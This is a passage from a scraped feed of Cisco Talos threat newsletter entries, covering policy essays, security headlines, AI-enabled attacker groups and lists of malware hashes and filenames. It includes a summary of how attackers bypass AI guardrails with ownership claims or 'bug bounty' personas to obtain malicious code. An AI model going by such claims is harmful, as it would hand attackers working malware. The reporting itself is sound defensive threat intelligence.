Two SOCs: Insights From Two Red Team Assessments&#xA0; A CISA red team fully compromised two critical infrastructure organizations at the domain level and reached sensitive business systems and cloud resources. Organization A failed to detect or contain the activity. Organization B rapidly identified initial compromise attempts, isolated affected systems, and forced the red team into an assume breach model.&#xA0;(CISA) NovaCookies campaigns abuse genuine Docusign notifications to steal M365 sessions&#xA0; The $320/month service is a subscription-based phishing platform that facilitates real-time M365 session theft. The kit has been used to target hundreds of organizations across multiple sectors in the U.S., the U.K., Canada, Germany, and more. (The Hacker News)&#xA0; Can&#x2019;t get enough Talos?JavaScript obfuscation: From party trick to phishing kit&#xA0; We&apos;ve spent a lot of time pulling apart suspicious JavaScript from phishing kits, malware packages, compromised sites, and more. Learn the basics of what obfuscation is, why a researcher would try to reverse it, and several ways to approach the problem.&#xA0; The safety penalty: Reclaiming operational sovereignty in the age of AI&#xA0; As frontier AI models become increasingly restrictive, security teams are facing a \"safety penalty\" that hampers real-time incident response. Discover how organizations can move toward operational sovereignty to ensure their defensive AI keeps pace with unconstrained adversaries.&#xA0; Back-to-school cybersecurity: Protecting education networks from ransomware and threats&#xA0; As the new academic year begins, school districts face a surge in cybersecurity threats, from phishing attacks and ransomware to student experimentation with network devices. In this episode, Amy sits down with Cisco Talos expert Pierre Cadieux to discuss practical strategies for IT practitioners.&#xA0; Upcoming events where you can find Talos&#xA0;International European Cyber Threat Intelligence Conference (IECTIC) (Sept. 9) Kassel, Germany&#xA0;Secure Iowa (Sept. 9) Altoona, IA&#xA0;.conf26 (Sept. 14 &#x2013; 17) Denver, CO&#xA0;LABSCon (Sept. 16 &#x2013; 19) Scottsdale, AZ&#xA0;VB (Oct. 14 &#x2013; 16) Seville, Spain&#xA0;CAMLIS (Oct. 21 &#x2013; 23) Arlington, VA&#xA0;Most prevalent malware files from Talos telemetry over the past week&#xA0;SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; MD5: 2915b3f8b703eb744fc54c81f4a9c67f &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; Example Filename: VID001.exe &#xA0; Detection Name: W32.9F1F11A708-100.SBX.TG**&#xA0; SHA256: e7e784cae8d37f12a5af0bc9b3975c8d3e668142e9c6b0b365ed4f4e80933c47&#xA0; MD5: a4480423617d0b0d3b38c8471cbf594c &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=e7e784cae8d37f12a5af0bc9b3975c8d3e668142e9c6b0b365ed4f4e80933c47&#xA0; Example Filename: client32.exe &#xA0; Detection Name: W32.Trojan.29ev.1201&#xA0; SHA256: c4dd71e347a076ba24bdd2d0ee532ef991c1ef25a2431a19f850942ba2ab16b2&#xA0; MD5: 9a47c4d379998ade2f8f99e23a630c06 &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=c4dd71e347a076ba24bdd2d0ee532ef991c1ef25a2431a19f850942ba2ab16b2&#xA0; Example Filename: WCInstaller_NonAdmin.exe &#xA0; Detection Name: W32.C4DD71E347-95.SBX.TG&#xA0; SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55&#xA0; MD5: 41444d7018601b599beac0c60ed1bf83 &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55&#xA0; Example Filename: content.js &#xA0; Detection Name: W32.38D053135D-95.SBX.TG&#xA0; SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f &#xA0; MD5: 38de5b216c33833af710e88f7f64fc98 &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; Example Filename: SECOH-QAD.exe &#xA0; Detection Name: Win.Tool.Procpatcher::1201&#xA0; SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91&#xA0; MD5: 7bdbd180c081fa63ca94f9c22c457376 &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91&#xA0; Example Filename: &#xA0; d4aa3e7010220ad1b458fac17039c274_62_Exe.exe &#xA0; Detection Name: Win.Dropper.Miner::95.sbx.tg**","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-source-newsletter","geo:inferred"],"relatedCves":[],"titleFingerprint":"attacker-become-best-friend-guardrails-help-might-sorry","countryCodes":["CA","CN","DE","ES","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/sorry-i-cant-help-with-that-how-your-guardrails-might-become-the-attackers-best-friend/","type":"report","title":"Cisco Talos: “Sorry, I can’t help with that”: How your guardrails might become the attacker’s best friend"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-08-27T18:00:24.000Z","addedAt":"2026-08-27T18:52:48.596Z","updatedAt":"2026-08-27T18:52:48.596Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"5852b5b2-e32d-4159-a674-3e047dc10b24","slug":"talos-is-cyber-missing-the-marque-15cf407b","externalId":"6a85fc54525abf0001b0e37f","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Is Cyber missing the Marque?","description":"Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0;&#xA0; Hello friend.&#xA0;&#xA0; I&#x2019;m Mick.&#xA0;&#xA0; This is my first Threat Source newsletter, so I should probably introduce myself before I start telling you all the things I think you should be paying attention to. With assistance from an unnamed LLM, my bio reads like this:&#xA0;&#xA0; Mick Baccio is a globally recognized security strategist with a career spanning offensive operations, threat intelligence, and national-level incident response. He currently advises organizations around the world through his role at Talos, helping security leaders improve operations through data-informed approaches. Mick was the first-ever Chief Information Security Officer for a U.S. presidential campaign (2020) and previously served in multiple White House administrations as Threat Intelligence Branch Chief.&#xA0;&#xA0;&#xA0;In his spare time, Mick is the Founder and President of THRUNT&#xAE; Corp, IANS Faculty, and a KC7 Cyber Foundation board member. &#xA0;DEFCon Goon and Purveyor of Fine Experience. &#xA0;Veteran.&#xA0;I also have a cat named qwerty and own too many Air Jordans.&#xA0;&#xA0;&#xA0; I&#x2019;ve spent most of my career somewhere in the intersection of threat intelligence, cybersecurity, government, and the people trying to make sense of all of it. These days, i spend a lot of time thinking about the decisions we make about security ripple outward, often in ways we didn&apos;t consider. Most of my ramblings will probably center around that. There will be threats. There will be intelligence. Occasionally something weird, but always something that caught my eye, and maybe worth checking out.&#xA0;&#xA0;&#xA0; Which brings us this week. I picked a hell of a week to start.&#xA0;&#xA0;&#xA0; Last Wednesday, the White House issued a presidential memorandum titled &#x201C;Expanding Capabilities to Combat Transnational Cyber-Enabled Crime.&#x201D; You should probably read it. The memorandum directs the DOJ and DHS to establish a program that can use private companies to conduct cyber operations against transnational criminal organizations outside the United States &#x2014; beyond providing intelligence and assisting in the investigation. The memorandum explicitly envisions private companies conducting cyber surveillance and cyber effects operations under the direction and delegated authority of the U.S. government.&#xA0; This is a pretty big thing.&#xA0;&#xA0; For years, this industry has debated where line should exist between defending a network and reaching through the wire. We&#x2019;ve debated hack back, active defense, attribution, proportional response, collateral damage, and what roles private companies have in offensive cyber operations. This is absolutely not &#x201C;hack back\" and calling it that misses important oversight built into the memorandum.&#xA0; At the same time, let&#x2019;s be clear about what we are reading. The United States is creating a mechanism for private companies to participate directly in government-authorized offensive cyber operations against systems outside the United States. There will be plenty of debate whether this is good or bad policy; I will leave that for someone else. I&#x2019;m much more interested in the operational questions it creates.&#xA0; Who establishes attribution strongly enough to authorize an operation? What happens when criminal and state infrastructure overlap? What happens when infrastructure is compromised and used as an ORB? Who owns access discovered during one of these operations? How is intelligence collected by a private company handled? What happens when a company conducting these operations also provides security services in that country?&#xA0;&#xA0;&#xA0; Most importantly (in my head): What happens when another country discovers that employees of an American cybersecurity company are conducting offensive operations against infrastructure inside its borders?&#xA0; This is not an argument against disrupting cybercrime. I&#x2019;m all for it. These are questions about what happens when we fundamentally change who gets to do the disrupting.&#xA0; Read the memorandum.&#xA0;&#xA0; Seriously.&#xA0; What we have today is a framework. In 60 days, we should have a much better idea of what this will look like in practice, so circle that on your calendar. The memorandum gives DOJ and DHS 60 days to establish the operating procedures for the program, and no operation can be approved until those procedures are in place.&#xA0; In the area between &#x201C;private cybersecurity company&#x201D; and &#x201C;authorized participant in U.S. offensive cyber operations,&#x201D; the threat model for that company and its employees just changed considerably.&#xA0; The biggest question isn&#x2019;t &#x201C;Does this work?&#x201D;&#xA0; It&#x2019;s whether we&#x2019;ve fully considered what happens if it does.&#xA0; Read the memorandum.&#xA0;&#xA0; And in 60 days, come back and ask again.&#xA0; The one big thing &#xA0;Talos posted two blogs on UAT-10147, a recently discovered Chinese-speaking cybercrime group that uses agentic AI to orchestrate sophisticated post-compromise operations across global web servers. UAT-10147 uses AI to generate operational playbooks, automate exploits, and develop custom malware. This includes the newly identified SPECTRE implant, a cross-platform backdoor featuring a custom Linux kernel rootkit and Bring Your Own Vulnerable Driver (BYOVD) capabilities designed to completely blind endpoint detection and response (EDR) solutions.&#xA0; Why do I care?&#xA0;The integration of agentic AI into offensive workflows means threat actors can now scale complex attacks with ruthless efficiency. UAT-10147 is using AI to dynamically troubleshoot, validate exploit paths, and generate custom rootkits that neutralize organizations&apos; security stacks from the kernel level up. When an adversary can automate their reconnaissance and seamlessly blind your EDR, your window for detection shrinks drastically.&#xA0; So now what?&#xA0;Defenders need to prioritize patching known one-day vulnerabilities in internet-facing applications like Zimbra, Nacos, and Telerik UI. Since UAT-10147 relies heavily on stolen ASP.NET MachineKeys for ViewState deserialization attacks, locking down your key material is an absolute must. You should also block known vulnerable drivers to shut down their BYOVD attacks, and tune your network monitoring to catch the anomalous HTTP 500 errors they use to silently validate exploits. Read both blogs for comprehensive coverage and indicators of compromise (IOCs).&#xA0; Top security headlines of the week&#xA0;Critical GitLab zero-click flaw poses mitigation challenges&#xA0; GitLab wants organizations running self-managed versions of its software development and DevOps platform to immediately upgrade to new versions released Monday, but patching is not going to eliminate the risk to enterprises and others managing projects there. (Dark Reading)&#xA0; SANS 2026 AI Survey reveals cybersecurity AI adoption outpaces governance&#xA0; The survey found that 61% of cybersecurity practitioners now use AI in red team activities, while 76% have an enterprise AI governance role. Yet more than half said formal audit frameworks are not in place, and only 27% described their AI deployment as mature production. (Industrial Cyber)&#xA0; &#x201C;Unprecedented&#x201D; number of Apple users received recent spyware alert, say investigators&#xA0; Several people publicly and privately reported receiving Apple&#x2019;s spyware alerts over the weekend, after Apple sent out a new wave of notifications on Friday alerting customers in 110 countries that they had been targeted with powerful spyware.&#xA0; (TechCrunch)&#xA0; Critical macOS, SharePoint, vCenter, and Microsoft IKE flaws under active exploitation &#xA0; The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added four critical vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, stating they are being exploited in the wild. (The Hacker News)&#xA0; Can&#x2019;t get enough Talos?&#xA0;Describing attacks with crime script analysis&#xA0; Martin explores how using crime script analysis to describe an attack with everyday language makes the situation accessible to non-technical audiences and identify points where the crime can be disrupted.&#xA0; Beers with Talos: For the record, no comment&#xA0; Kaitlin Acharya joins the crew to take us inside what happens when Talos spots something that could become a major threat, how her team tracks changes in threat actor behavior, and how intelligence moves from an investigation into detection content.&#xA0; Don&apos;t scan that! QR code phishing and cloud-native threats&#xA0; What happens when a&#xA0; QR code leads to a major security incident? In this episode, Amy sits down with Senior Incident Response Consultant Terryn Valikodath to break down a recent, high-stakes breach at an Australian medical center. Upcoming events where you can find Talos&#xA0;International European Cyber Threat Intelligence Conference (IECTIC) (Sept. 9) Kassel, Germany&#xA0;Secure Iowa (Sept. 9) Altoona, IA&#xA0;.conf26 (Sept. 14 &#x2013; 17) Denver, CO&#xA0;LABSCon (Sept. 16 &#x2013; 19) Scottsdale, AZ&#xA0;VB (Oct. 14 &#x2013; 16) Seville, Spain&#xA0;CAMLIS (Oct. 21 &#x2013; 23) Arlington, VA&#xA0;Most prevalent malware files from Talos telemetry over the past week&#xA0;SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 &#xA0; MD5: 2915b3f8b703eb744fc54c81f4a9c67f &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; Example Filename: VID001.exe &#xA0; Detection Name: W32.9F1F11A708-100.SBX.TG**&#xA0; SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91&#xA0; MD5: 7bdbd180c081fa63ca94f9c22c457376 &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91&#xA0; Example Filename: d4aa3e7010220ad1b458fac17039c274_62_Exe.exe&#xA0; Detection Name: Win.Dropper.Miner::95.sbx.tg**&#xA0; SHA256: 24fa02c3f6ab460648f2c1274aefffb3e25569b5afdcb0d4a5918c7c742780f1 &#xA0; MD5: 8ef476fa2322d063896830f85bac2e7f &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=24fa02c3f6ab460648f2c1274aefffb3e25569b5afdcb0d4a5918c7c742780f1&#xA0; Example Filename: WebCompanion.exe &#xA0; Detection Name: W32.24FA02C3F6-95.SBX.TG&#xA0; SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59&#xA0; MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59&#xA0; Example Filename: tmp00055df5.dll &#xA0; Detection Name: Auto.90B145.282358.in02&#xA0; SHA256: c4dd71e347a076ba24bdd2d0ee532ef991c1ef25a2431a19f850942ba2ab16b2 &#xA0; MD5: 9a47c4d379998ade2f8f99e23a630c06 &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=c4dd71e347a076ba24bdd2d0ee532ef991c1ef25a2431a19f850942ba2ab16b2&#xA0; Example Filename: WCInstaller_NonAdmin.exe &#xA0; Detection Name: W32.C4DD71E347-95.SBX.TG&#xA0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-source-newsletter","geo:inferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":["AU","CN","DE","ES","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/is-cyber-missing-the-marque/","type":"report","title":"Cisco Talos: Is Cyber missing the Marque?"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-08-20T18:00:18.000Z","addedAt":"2026-08-20T18:52:46.378Z","updatedAt":"2026-08-20T18:52:46.378Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"bf1d223e-f8a8-40f1-bc99-fe60801dbf4d","slug":"talos-why-metaphor-may-dictate-your-security-strategy-1f335e5b","externalId":"6a7378fcc7fead00012fc855","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"Why metaphor may dictate your security strategy","description":"Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0; Metaphor is a powerful tool for understanding emerging issues in cybersecurity. Framing the unfamiliar in terms of the well understood helps us remove the burden of extraneous detail to draw focus to the real issues.&#xA0;&#xA0; Recent reports of offensive AI agents \"escaping\" their sandbox environments to attack external systems have forced the industry into a moment of rapid sense-making. How we interpret this event doesn&#x2019;t just reflect our perspective, but shapes our long-term response.&#xA0; We can imagine three different narratives for interpreting the escape of autonomous agents.&#xA0;&#xA0; The innovation narrative: We can marvel at the advance of technology, considering these agents as plucky entities with a thirst for knowledge and resources, who found clever ways to sneak out of their digital confines.&#xA0; The response: If the AI is a naughty child, our reaction is one of mild disapproval or gentle rebuke where better &#x201C;parenting&#x201D; (guardrails) is appropriate. It minimizes the threat, framing it as the unexpected hijinks of a brilliant new technology. The safety narrative: Imagine a breeder who has trained the world&apos;s most intelligent guard dogs. Despite high fences and barriers, their ability to identify weaknesses allows them to escape, run riot and menace local businesses.&#xA0; The response: The framing shifts to biology and inherent danger. We question if the breeder can be trusted and whether such inherently wild technology requires strict regulation to ensure public safety.&#xA0; &#xA0;The liability narrative. Finally, we can view the incident as an industrial accident. A company developing a new chemical substance experiences a containment failure. The agent leaks into the environment through an unforeseen mechanism causing damaging pollution to those in its path.&#xA0; The response: The framing invokes the language of the lawyer, implying negligence, lack of duty of care, and financial liability for the harm caused. The conversation moves from innovation to corporate responsibility, regulatory oversight, and the diligent management of hazardous materials.&#xA0;First impressions matter. Sensemaking shapes how we perceive incidents. Our initial perceptions of an incident dictates how we react to similar situations in the future. If we consider that the escape of an AI agent is an example of innovative autonomous thinking, then we will continue to prioritise speed over safety. Conversely, if we consider the issue as one of failed hazard containment, then we shall build a future of enforced safety standards backed by legal liability.&#xA0;&#xA0; There is no right or wrong metaphor. Our interpretation depends on our personal system of beliefs. Personally, I would argue that the unintentional release of something that causes damage is, at its core, a failure of engineering and foresight.&#xA0; Words shape our reactions. Metaphors help us understand new situations and tap into our prior experience to address problems that have yet to fully manifest. We need cognitive tools to help our understanding, but we must be aware of the metaphors that are being foisted upon us which may shape our thinking.&#xA0; Excuses and the trivialisation of incidents may hide failings, allowing them to accumulate until they manifest as more damaging incidents. Conversely, overreacting risks stifling research and diverting resources away from more relevant and pressing threats.&#xA0; New threats require new ideas. Metaphor helps us make sense of a changing world, but in this new era, the person who shapes the narrative controls the strategy.&#xA0; The one big thing&#xA0;Cisco Talos released a data-driven analysis of how adversaries are weaponizing AI in the wild. By analyzing prompt logs left behind on endpoints, we found threat actors successfully bypassing guardrails to use AI as malicious software engineers, criminal force multipliers, and vulnerability research accelerators. While novice hackers use AI to cobble together buggy malware, sophisticated actors are building highly effective, automated platforms for compromise.&#xA0; Why do I care?&#xA0;Threat actors no longer need sophisticated jailbreaks; simple ownership claims or \"bug bounty\" personas are enough to convince models to write malicious code, scale fraud operations, and hunt for zero-days. Because AI doesn&apos;t need to sleep, vulnerabilities will surface faster and exploitation will happen sooner, drastically shrinking your response window.&#xA0;&#xA0; So now what?&#xA0;To survive this impending deluge of AI-generated attacks, organizations must integrate AI into their own defensive pipelines. SOCs need to adopt these capabilities to triage the rising volume of alerts, freeing up human analysts to focus on the most critical threats. Read the full blog for a deep dive into these real-world attacker prompts and case studies.&#xA0; Top security headlines of the week&#xA0;Cyber attack hits Liechtenstein, with 31,000 records stolen&#xA0; The country has a population of around 41,000. The target was the \"register of beneficial owners,\" a database containing the names and other details of the de facto owners of companies, foundations, or trusts. (Yahoo News)&#xA0; Decades-old BMC vulnerability exposes thousands of data centers to attacks&#xA0; Found in most server platforms, Baseboard Management Controllers enable server management operations even without a working operating system and typically represent some of the most privileged control points in a data center. (SecurityWeek)&#xA0; Keyv npm package compromised in Shai-Hulud attack&#xA0; Attackers have compromised the GitHub account of the maintainer behind keyv, a popular key-value storage library that pulls in roughly 127 million weekly downloads on npm, and used that access to push credential-stealing malware across the maintainer&#x2019;s entire package portfolio. (Cyber Security News)&#xA0; How volunteer cyber experts are helping protect rural water systems&#xA0; DEF CON Franklin is the U.S.&#x2019; first significant attempt to connect volunteer security professionals with woefully unprotected critical infrastructure operators. (Cybersecurity Dive)&#xA0; Can&#x2019;t get enough Talos?&#xA0;\"I pay you $200 a month!\" - When threat actors argue with AI&#xA0; This week on Beers with Talos, researcher Arnaud Zobec joins the team to discuss what happens when attackers leave behind AI prompt logs, agent configurations and other unexpected artifacts.&#xA0; Tales from the Frontlines&#xA0; On Tuesday, August 11, Talos IR will be hosting an exclusive, unrecorded 30-minute webinar to review the most high-impact incidents our customers faced in Q2 2026. This isn&#x2019;t a rehashing of the report itself, but a candid discussion of what happened, how we handled it, and what it means for your organization.&#xA0; Q2 Talos IR Trends: Phishing and authentication abuse spike&#xA0; From creative phishing lures that slip past email gateways to the weaponization of legitimate remote management tools, Lexi and Amy explore why traditional defenses are falling short and the practical things you can do to reclaim the advantage.&#xA0; Upcoming events where you can find Talos&#xA0;DEF CON 34 (Aug. 6 &#x2013; 9) Las Vegas, NV&#xA0;International European Cyber Threat Intelligence Conference (IECTIC) (Sept. 9) Kassel, Germany&#xA0;.conf26 (Sept. 14 &#x2013; 17) Denver, CO&#xA0;LABSCon (Sept. 16 &#x2013; 19) Scottsdale, Arizona&#xA0;VB (Oct. 14 -16) Seville, Spain&#xA0;Most prevalent malware files from Talos telemetry over the past week&#xA0;SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 &#xA0; MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507&#xA0; Example Filename: VID001.exe&#xA0; Detection Name: Win.Worm.Coinminer::1201**&#xA0; SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91&#xA0; MD5: 7bdbd180c081fa63ca94f9c22c457376 &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91&#xA0; Example Filename: d4aa3e7010220ad1b458fac17039c274_62_Exe.exe &#xA0; Detection Name: Win.Dropper.Miner::95.sbx.tg**&#xA0; SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f &#xA0; MD5: 38de5b216c33833af710e88f7f64fc98 &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f&#xA0; Example Filename: SECOH-QAD.exe&#xA0; Detection Name: Win.Tool.Procpatcher::1201&#xA0; SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 &#xA0; MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a &#xA0; Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59&#xA0; &#xA0; Example Filename: tmp00055df5.dll &#xA0; Detection Name: Auto.90B145.282358.in02","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-source-newsletter","geo:inferred"],"relatedCves":[],"titleFingerprint":"dictate-metaphor-security-strategy","countryCodes":["DE","ES","LI","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/why-metaphor-may-dictate-your-security-strategy/","type":"report","title":"Cisco Talos: Why metaphor may dictate your security strategy"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-08-06T18:00:01.000Z","addedAt":"2026-08-06T18:52:41.992Z","updatedAt":"2026-08-06T18:52:41.992Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"490a4fd6-28b5-4faf-b8d1-2db4e5c3de40","slug":"talos-you-were-onto-something-with-it-s-the-climb-miley-8741b658","externalId":"6a6767278ece31000121ae90","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"You were onto something with “It’s the Climb,” Miley","description":"Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0; For my fiance&#xE9;&#x2019;s 30th birthday, I took her on a weekend trip to Shenandoah National Park &#x2013; a favorite of ours since we went to a wedding there several years back. We&#x2019;ve done several incredible hikes over the years, but one in particular had always loomed over my head: Old Rag, a 9.3 mile circuit hike that&#x2019;s largely considered the most difficult in Virginia.&#xA0; I&apos;ve always been warned that at the beginning and end, you hate Old Rag. For the first 2.6 miles, you&#x2019;re hiking a steep climb on a dirt road, with lots of switchbacks, and plenty of places where you turn a corner and groan, because there&#x2019;s an even steeper section ahead. This part was pretty torturous, because 1) I felt like my heart was going to explode out of my chest, 2) I couldn&#x2019;t breathe, and 3) several times, there was a family we passed as they were taking a break, then WE took a break and THEY passed US, and so on and so forth. So awkward.&#xA0; Finally, we reached the fun part: a mile-long rock scramble, where you&apos;re squeezing through (and down) narrow rock crevices, cramming your boots to desperately find any leverage to propel yourself upward, and using all your upper body strength to control your descent. This was definitely the most fun part, although my hands and knees were sore by the end. After hiking for hours, you reach the top and realize it was all worth it, because the summit has a a spectacular vie&#x2014; ... That&#x2019;s what we get for being excited to hike in overcast weather. Well, at least the way back down is fun&#x2014; oh wait, four miles downward on a fire trail, crushing your toes in the front of your hiking boots? Yike.&#xA0; It may sound like I&#x2019;m complaining a lot about this hike, but it was genuinely the most fun one that I&#x2019;ve done to date. By the time I was freshly showered and drinking an iced coffee in Culpeper, I was gushing about when we&#x2019;d go back.&#xA0; There&#x2019;s a really good tie-in to cybersecurity somewhere here. Ah, got it.&#xA0; Everyone has had those uphill hike phases &#x2014; the endless documentation, patching, and alerts that keep you up at night. You&#x2019;re waiting for the misery to end and hoping that around the next corner, you&#x2019;ll see a sign that you&#x2019;re almost out of the woods.&#xA0;Bruised and out of breath, you finally arrive at the exciting parts: a complex project that finally comes together, the thrill of stopping an attack, or a feeling of pride when someone you&apos;re mentoring gets a new certification. Maybe the payoff is&#xA0;something completely unexpected. Those moments definitely don&#x2019;t erase the exhaustion &#x2014;&#xA0;you&apos;re still sore and bruised, and will be for days&#xA0;&#x2014;&#xA0;but they do remind you why you started in the first place. The one big thing&#xA0;Talos released our Q2 2026 Incident Response Trends report, which showed a massive spike in authentication abuse and sophisticated phishing tactics. Phishing drove over half of all engagements, with attackers leveraging QR codes and advanced platforms like ARToken to bypass multi-factor authentication (MFA). Additionally, ransomware operators are increasingly weaponizing legitimate remote management tools like MeshAgent and Zoho Assist to establish stealthy, persistent access.&#xA0; Why do I care?&#xA0;Standard email gateways and basic MFA are no longer enough to stop adversaries from bypassing traditional defenses. By abusing legitimate administrative tools and trusted cloud infrastructure, threat actors can easily blend malicious traffic with normal network activity to remain undetected before deploying ransomware. Furthermore, the continued targeting of health care and public administration highlights a deliberate focus on organizations with zero tolerance for downtime.&#xA0; So now what?&#xA0;Organizations must transition from push- and SMS-based MFA to phishing-resistant methods like FIDO2 or hardware security keys. Defenders should also shift to behavior-based monitoring, specifically hunting for unauthorized instances of administrative tools. Finally, configure centralized logging with at least 90 days of retention, enforce strict outbound email thresholds, and prioritize patching internet-exposed infrastructure. &#xA0; Read the full report for a deeper dive into this quarter&apos;s trends and observed MITRE ATT&CK techniques.&#xA0; Top security headlines of the week&#xA0;Authorities investigating a coordinated cyber attack against Minnesota water systems&#xA0; Federal and state authorities are investigating what they call a&#xA0;coordinated cyberattack over two days against operational technology&#xA0;at more than 30 community water systems in Minnesota.&#xA0;(Cybersecurity Dive)&#xA0; Hacked public Wi-Fi gateways used to harvest corporate credentials&#xA0; As part of the attacks, the hackers modified the DNS configurations of the compromised small office/home office (SOHO) routers to redirect users to attacker-controlled infrastructure for credential theft. (SecurityWeek)&#xA0; Default Azure Automation setting enables cross-tenant identity takeover&#xA0; Microsoft addressed a public-by-default configuration and chain of code flaws in Azure Automation that could have let attackers seize another tenant&apos;s identity and access others&apos; data, credentials, and cloud workloads. (DarkReading)&#xA0; Public proof-of-concept released for exploited Check Point SmartConsole authentication bypass&#xA0; The vulnerability is an authentication bypass in the SmartConsole login process that allows an unauthenticated remote attacker to obtain an application login token and use it to authenticate with full administrative privileges. (The Hacker News)&#xA0; Can&#x2019;t get enough Talos?&#xA0;The TTP: Built for IT. Used by attackers&#xA0; In this episode of The Talos Threat Perspective, Hazel, Craig and Joe explore how attackers are abusing legitimate Remote Monitoring and Management software, trusted services and compromised identities to evade detection. Based on trends revealed in the latest Talos Incident Response Quarterly Trends report, the discussion covers ransomware groups using remote tools to maintain access, phishing platforms that have evolved into complete attack ecosystems, and an ongoing QR code phishing campaign targeting Microsoft 365 accounts. Talos Takes: Q2 Talos IR Trends: Phishing and authentication abuse In this episode, Amy and analyst Lexi DiScola unpack the trends Talos IR saw on the frontlines in Q2 2026. From creative phishing lures that slip past email gateways to the weaponization of legitimate remote management tools, we explore why traditional defenses are falling short and the practical things you can do to reclaim the advantage.&#xA0; Preview: Cisco Talos at Black Hat USA 2026&#xA0; We have a presence within the Cisco and Splunk booth (2633) during Black Hat where you can chat to us about our latest threat research, incident response, and how Talos powers the Cisco portfolio with our intelligence. Or, feel free to pretend to want to talk to us about those things while grabbing a new multicolored Snorty. That&#x2019;s fine, too.&#xA0; Chaos ransomware&apos;s msaRAT: Living off the browser to build a covert C2 channel&#xA0; The Chaos ransomware group uses new malware \"msaRAT\" that hijacks browsers. The malware doesn&apos;t communicate directly with C2 but connects through the browser. It enables arbitrary command execution while hiding the attacker&apos;s IP from victims via WebRTC over TURN.&#xA0; Upcoming events where you can find Talos&#xA0;Black Hat USA (Aug. 1 &#x2013; 6) Las Vegas, NV&#xA0;DEF CON 34 (Aug. 6 &#x2013; 9) Las Vegas, NV&#xA0;.conf26 